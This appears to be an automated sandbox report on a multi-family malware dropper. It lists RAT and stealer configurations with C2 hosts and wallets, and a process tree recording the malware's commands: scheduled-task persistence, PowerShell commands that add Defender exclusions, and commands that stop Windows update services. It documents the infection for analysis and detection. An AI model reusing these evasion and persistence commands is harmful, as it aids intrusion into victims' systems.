Resubmissions

14-11-2024 23:57

241114-3zzkpavhpf 10

14-11-2024 23:44

241114-3rj52avgna 10

14-11-2024 23:36

241114-3ln7ssvjfs 10

14-11-2024 23:24

241114-3dnajayler 10

14-11-2024 23:10

241114-25qpastqgt 10

Analysis

  • max time kernel
    235s
  • max time network
    291s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    14-11-2024 23:57

General

  • Target

    4363463463464363463463463.exe

  • Size

    10KB

  • MD5

    2a94f3960c58c6e70826495f76d00b85

  • SHA1

    e2a1a5641295f5ebf01a37ac1c170ac0814bb71a

  • SHA256

    2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

  • SHA512

    fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f

  • SSDEEP

    192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Malware Config

Extracted

Family

quasar

Version

1.4.0

Botnet

Target

C2

127.0.0.1:6070

affasdqa.ddns.net:6070

haffasdqa.duckdns.org:6070

Mutex

670d21b7-71ed-4958-9ba7-a58fa54d8203

Attributes
  • encryption_key

    25B2622CE0635F9A273AB61B1B7D7B94220AC509

  • install_name

    svhoste.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    svhoste

  • subdirectory

    SubDir

Extracted

Family

phorphiex

C2

http://185.215.113.66/

http://91.202.233.141/

Wallets

0xCa90599132C4D88907Bd8E046540284aa468a035

TRuGGXNDM1cavQ1AqMQHG8yfxP4QWVSMN6

qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r

XryzFMFVpDUvU7famUGf214EXD3xNUSmQf

rsXCXBf9SagxV8JfC12d8Bybk84oPdMNN9

AULzfBuUAPfCGAXoG5Vq14aP9s6fx3AH4Z

LTK4xdKPAgFHPLan8kriAD7eY4heyy73mB

MP8GEm8QpYgQYaMo8oM5NQhRBgDGiLZW5Q

4BB7ckkaPTyADc8trtuwDoZxywaR4eNL5cDJ3KBjq9GraN4mUFztf7mLS7WgT7Bh7uPqpjvA4ypVwXKCJ1vvLWWAFvSmDoD

15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC

1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK

ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp

3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc

3ESHude8zUHksQg1h6hHmzY79BS36L91Yn

DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA

t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh

stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj

bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2

bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr

bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd

Attributes
  • mutex

    mmn7nnm8na

  • user_agent

    Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36

Extracted

Family

phorphiex

C2

http://185.215.113.84

Extracted

Family

quasar

Attributes
  • reconnect_delay

    3000

Extracted

Family

xworm

Version

5.0

C2

178.215.224.96:7886

Mutex

eI2rMhB46IPDjynT

Attributes
  • install_file

    USB.exe

aes.plain
aes.plain

Extracted

Family

xworm

C2

147.185.221.22:47930

127.0.0.1:47930

Attributes
  • Install_directory

    %AppData%

  • install_file

    svchost.exe

Extracted

Family

quasar

Version

1.4.0

Botnet

Office04

C2

192.168.31.99:4782

2001:4bc9:1f98:a4e::676:4782

255.255.255.0:4782

fe80::cabf:4cff:fe84:9572%17:4782

Mutex

1f65a787-81b8-4955-95e4-b7751e10cd50

Attributes
  • encryption_key

    A0B82A50BBC49EC084E3E53A9E34DF58BD7050B9

  • install_name

    Neverlose Loader.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Java Updater

  • subdirectory

    SubDir

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

18.ip.gl.ply.gg:6606

18.ip.gl.ply.gg:7707

18.ip.gl.ply.gg:8808

18.ip.gl.ply.gg:9028

Mutex

HyFTucy74RnH

Attributes
  • delay

    3

  • install

    true

  • install_file

    Discord.exe

  • install_folder

    %AppData%

aes.plain

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.2

Botnet

Default

C2

47.238.55.14:4449

Mutex

rqwcncaesrdtlckoweu

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

cryptbot

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

62.113.117.95:4449

Mutex

hwelcvbupaqfzors

Attributes
  • delay

    10

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • Ammyy Admin

    Remote admin tool with various capabilities.

  • AmmyyAdmin payload 1 IoCs
  • Ammyyadmin family
  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • CryptBot

    CryptBot is a C++ stealer distributed widely in bundle with other software.

  • Cryptbot family
  • Detect Xworm Payload 11 IoCs
  • FlawedAmmyy RAT

    Remote-access trojan based on leaked code for the Ammyy remote admin software.

  • Flawedammyy family
  • Lockbit

    Ransomware family with multiple variants released since late 2019.

  • Lockbit family
  • Modifies security service 2 TTPs 3 IoCs
  • Phorphiex family
  • Phorphiex payload 4 IoCs
  • Phorphiex, Phorpiex

    Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 10 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • Redline family
  • Rule to detect Lockbit 3.0 ransomware Windows payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
  • Windows security bypass 2 TTPs 18 IoCs
  • Xmrig family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Async RAT payload 1 IoCs
  • Renames multiple (317) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • XMRig Miner payload 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Stops running service(s) 4 TTPs
  • Drops startup file 12 IoCs
  • Executes dropped EXE 64 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 21 IoCs
  • Adds Run key to start application 2 TTPs 12 IoCs
  • Drops desktop.ini file(s) 2 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Checks system information in the registry 2 TTPs 2 IoCs

    System information is often read in order to detect sandboxing environments.

  • Drops autorun.inf file 1 TTPs 5 IoCs

    Malware can abuse Windows Autorun to spread further via attached volumes.

  • Drops file in System32 directory 4 IoCs
  • Enumerates processes with tasklist 1 TTPs 6 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • UPX packed file 7 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 23 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 13 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Control Panel 2 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • Runs ping.exe 1 TTPs 12 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 20 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 38 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Loads dropped DLL
    PID:1180
    • C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
      "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2372
      • C:\Users\Admin\AppData\Local\Temp\Files\svhoste.exe
        "C:\Users\Admin\AppData\Local\Temp\Files\svhoste.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2816
        • C:\Windows\system32\schtasks.exe
          "schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\svhoste.exe" /rl HIGHEST /f
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:316
        • C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe
          "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1588
          • C:\Windows\system32\schtasks.exe
            "schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f
            5⤵
            • Scheduled Task/Job: Scheduled Task
            PID:2796
          • C:\Windows\system32\cmd.exe
            cmd /c ""C:\Users\Admin\AppData\Local\Temp\U04yuqxtX6bd.bat" "
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3024
            • C:\Windows\system32\chcp.com
              chcp 65001
              6⤵
                PID:3008
              • C:\Windows\system32\PING.EXE
                ping -n 10 localhost
                6⤵
                • System Network Configuration Discovery: Internet Connection Discovery
                • Runs ping.exe
                PID:2436
              • C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe
                "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                PID:664
                • C:\Windows\system32\schtasks.exe
                  "schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f
                  7⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:2128
                • C:\Windows\system32\cmd.exe
                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\ItSTVVu8y9Ad.bat" "
                  7⤵
                    PID:2996
                    • C:\Windows\system32\chcp.com
                      chcp 65001
                      8⤵
                        PID:1436
                      • C:\Windows\system32\PING.EXE
                        ping -n 10 localhost
                        8⤵
                        • System Network Configuration Discovery: Internet Connection Discovery
                        • Runs ping.exe
                        PID:992
                      • C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe
                        "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"
                        8⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of SetWindowsHookEx
                        PID:1220
                        • C:\Windows\system32\schtasks.exe
                          "schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f
                          9⤵
                          • Scheduled Task/Job: Scheduled Task
                          PID:2784
                        • C:\Windows\system32\cmd.exe
                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\pFW6zZ9J8A9U.bat" "
                          9⤵
                            PID:2592
                            • C:\Windows\system32\chcp.com
                              chcp 65001
                              10⤵
                                PID:2960
                              • C:\Windows\system32\PING.EXE
                                ping -n 10 localhost
                                10⤵
                                • System Network Configuration Discovery: Internet Connection Discovery
                                • Runs ping.exe
                                PID:2916
                              • C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe
                                "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"
                                10⤵
                                • Executes dropped EXE
                                • Suspicious use of SetWindowsHookEx
                                PID:3036
                                • C:\Windows\system32\schtasks.exe
                                  "schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f
                                  11⤵
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:3148
                                • C:\Windows\system32\cmd.exe
                                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\DrDn0KciLIhW.bat" "
                                  11⤵
                                    PID:3540
                                    • C:\Windows\system32\chcp.com
                                      chcp 65001
                                      12⤵
                                        PID:3584
                                      • C:\Windows\system32\PING.EXE
                                        ping -n 10 localhost
                                        12⤵
                                        • System Network Configuration Discovery: Internet Connection Discovery
                                        • Runs ping.exe
                                        PID:3580
                                      • C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe
                                        "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"
                                        12⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetWindowsHookEx
                                        PID:3052
                                        • C:\Windows\system32\schtasks.exe
                                          "schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f
                                          13⤵
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2700
                                        • C:\Windows\system32\cmd.exe
                                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\aQISEX3P4FYR.bat" "
                                          13⤵
                                            PID:1952
                                            • C:\Windows\system32\chcp.com
                                              chcp 65001
                                              14⤵
                                                PID:3884
                                              • C:\Windows\system32\PING.EXE
                                                ping -n 10 localhost
                                                14⤵
                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                • Runs ping.exe
                                                PID:3968
                                              • C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe
                                                "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"
                                                14⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetWindowsHookEx
                                                PID:1840
                                                • C:\Windows\system32\schtasks.exe
                                                  "schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f
                                                  15⤵
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:2096
                                                • C:\Windows\system32\cmd.exe
                                                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2Q1ilIknCiI7.bat" "
                                                  15⤵
                                                    PID:3168
                                                    • C:\Windows\system32\chcp.com
                                                      chcp 65001
                                                      16⤵
                                                        PID:3068
                                                      • C:\Windows\system32\PING.EXE
                                                        ping -n 10 localhost
                                                        16⤵
                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                        • Runs ping.exe
                                                        PID:744
                                                      • C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe
                                                        "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"
                                                        16⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:2896
                                                        • C:\Windows\system32\schtasks.exe
                                                          "schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f
                                                          17⤵
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:3364
                                                        • C:\Windows\system32\cmd.exe
                                                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\1rPwmYAqGxXj.bat" "
                                                          17⤵
                                                            PID:3424
                                                            • C:\Windows\system32\chcp.com
                                                              chcp 65001
                                                              18⤵
                                                                PID:2488
                                                              • C:\Windows\system32\PING.EXE
                                                                ping -n 10 localhost
                                                                18⤵
                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                • Runs ping.exe
                                                                PID:3964
                                                              • C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe
                                                                "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"
                                                                18⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:3116
                                                                • C:\Windows\system32\schtasks.exe
                                                                  "schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f
                                                                  19⤵
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:3532
                                                                • C:\Windows\system32\cmd.exe
                                                                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\HsBVlqJxJmmb.bat" "
                                                                  19⤵
                                                                    PID:2332
                                                                    • C:\Windows\system32\chcp.com
                                                                      chcp 65001
                                                                      20⤵
                                                                        PID:3244
                                                                      • C:\Windows\system32\PING.EXE
                                                                        ping -n 10 localhost
                                                                        20⤵
                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                        • Runs ping.exe
                                                                        PID:3548
                                                                      • C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe
                                                                        "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"
                                                                        20⤵
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:5648
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          "schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f
                                                                          21⤵
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:904
                                                                        • C:\Windows\system32\cmd.exe
                                                                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\9p4A6R13FBvM.bat" "
                                                                          21⤵
                                                                            PID:5248
                                                                            • C:\Windows\system32\chcp.com
                                                                              chcp 65001
                                                                              22⤵
                                                                                PID:480
                                                                              • C:\Windows\system32\PING.EXE
                                                                                ping -n 10 localhost
                                                                                22⤵
                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                • Runs ping.exe
                                                                                PID:1848
                                                                              • C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe
                                                                                "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"
                                                                                22⤵
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:5372
                                                                                • C:\Windows\system32\schtasks.exe
                                                                                  "schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f
                                                                                  23⤵
                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                  PID:4436
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2dQap6RBdtP9.bat" "
                                                                                  23⤵
                                                                                    PID:1984
                                                                                    • C:\Windows\system32\chcp.com
                                                                                      chcp 65001
                                                                                      24⤵
                                                                                        PID:4468
                                                                                      • C:\Windows\system32\PING.EXE
                                                                                        ping -n 10 localhost
                                                                                        24⤵
                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                        • Runs ping.exe
                                                                                        PID:4484
                                                                                      • C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"
                                                                                        24⤵
                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                        PID:6272
                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                          "schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f
                                                                                          25⤵
                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                          PID:5668
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\6WYamtX1Jzt8.bat" "
                                                                                          25⤵
                                                                                            PID:5936
                                                                                            • C:\Windows\system32\chcp.com
                                                                                              chcp 65001
                                                                                              26⤵
                                                                                                PID:6060
                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                ping -n 10 localhost
                                                                                                26⤵
                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                • Runs ping.exe
                                                                                                PID:3812
                                                                                              • C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"
                                                                                                26⤵
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:6000
                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                  "schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f
                                                                                                  27⤵
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:6108
                                                • C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Adds Run key to start application
                                                  • Drops file in Windows directory
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:2348
                                                  • C:\Windows\sysppvrdnvs.exe
                                                    C:\Windows\sysppvrdnvs.exe
                                                    4⤵
                                                    • Modifies security service
                                                    • Windows security bypass
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • Windows security modification
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:2196
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                                      5⤵
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:2448
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                                        6⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2080
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
                                                      5⤵
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:1692
                                                      • C:\Windows\SysWOW64\sc.exe
                                                        sc stop UsoSvc
                                                        6⤵
                                                        • Launches sc.exe
                                                        PID:2628
                                                      • C:\Windows\SysWOW64\sc.exe
                                                        sc stop WaaSMedicSvc
                                                        6⤵
                                                        • Launches sc.exe
                                                        • System Location Discovery: System Language Discovery
                                                        PID:348
                                                      • C:\Windows\SysWOW64\sc.exe
                                                        sc stop wuauserv
                                                        6⤵
                                                        • Launches sc.exe
                                                        • System Location Discovery: System Language Discovery
                                                        PID:1660
                                                      • C:\Windows\SysWOW64\sc.exe
                                                        sc stop DoSvc
                                                        6⤵
                                                        • Launches sc.exe
                                                        PID:2000
                                                      • C:\Windows\SysWOW64\sc.exe
                                                        sc stop BITS /wait
                                                        6⤵
                                                        • Launches sc.exe
                                                        PID:1500
                                                    • C:\Users\Admin\AppData\Local\Temp\1754010522.exe
                                                      C:\Users\Admin\AppData\Local\Temp\1754010522.exe
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      PID:1236
                                                      • C:\Users\Admin\AppData\Local\Temp\820810029.exe
                                                        C:\Users\Admin\AppData\Local\Temp\820810029.exe
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Drops desktop.ini file(s)
                                                        • Sets desktop wallpaper using registry
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        • Modifies Control Panel
                                                        • Modifies registry class
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2008
                                                        • C:\ProgramData\F3B2.tmp
                                                          "C:\ProgramData\F3B2.tmp"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          • System Location Discovery: System Language Discovery
                                                          PID:3328
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /C DEL /F /Q C:\PROGRA~3\F3B2.tmp >> NUL
                                                            8⤵
                                                              PID:3412
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1236 -s 836
                                                          6⤵
                                                          • Loads dropped DLL
                                                          • Program crash
                                                          PID:3112
                                                      • C:\Users\Admin\AppData\Local\Temp\2572212193.exe
                                                        C:\Users\Admin\AppData\Local\Temp\2572212193.exe
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2688
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                                          6⤵
                                                            PID:2480
                                                            • C:\Windows\system32\reg.exe
                                                              reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                                              7⤵
                                                                PID:2168
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
                                                              6⤵
                                                                PID:1604
                                                                • C:\Windows\system32\schtasks.exe
                                                                  schtasks /delete /f /tn "Windows Upgrade Manager"
                                                                  7⤵
                                                                    PID:2620
                                                              • C:\Users\Admin\AppData\Local\Temp\259973368.exe
                                                                C:\Users\Admin\AppData\Local\Temp\259973368.exe
                                                                5⤵
                                                                • Executes dropped EXE
                                                                PID:2620
                                                              • C:\Users\Admin\AppData\Local\Temp\2924327870.exe
                                                                C:\Users\Admin\AppData\Local\Temp\2924327870.exe
                                                                5⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                PID:696
                                                                • C:\Users\Admin\AppData\Local\Temp\1229421168.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\1229421168.exe
                                                                  6⤵
                                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                  • Executes dropped EXE
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:3376
                                                          • C:\Users\Admin\AppData\Local\Temp\Files\3.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\Files\3.exe"
                                                            3⤵
                                                            • Executes dropped EXE
                                                            • Adds Run key to start application
                                                            • Drops file in Windows directory
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2392
                                                            • C:\Windows\sysklnorbcv.exe
                                                              C:\Windows\sysklnorbcv.exe
                                                              4⤵
                                                              • Modifies security service
                                                              • Windows security bypass
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Windows security modification
                                                              • Suspicious behavior: SetClipboardViewer
                                                              PID:2652
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                                                5⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2664
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
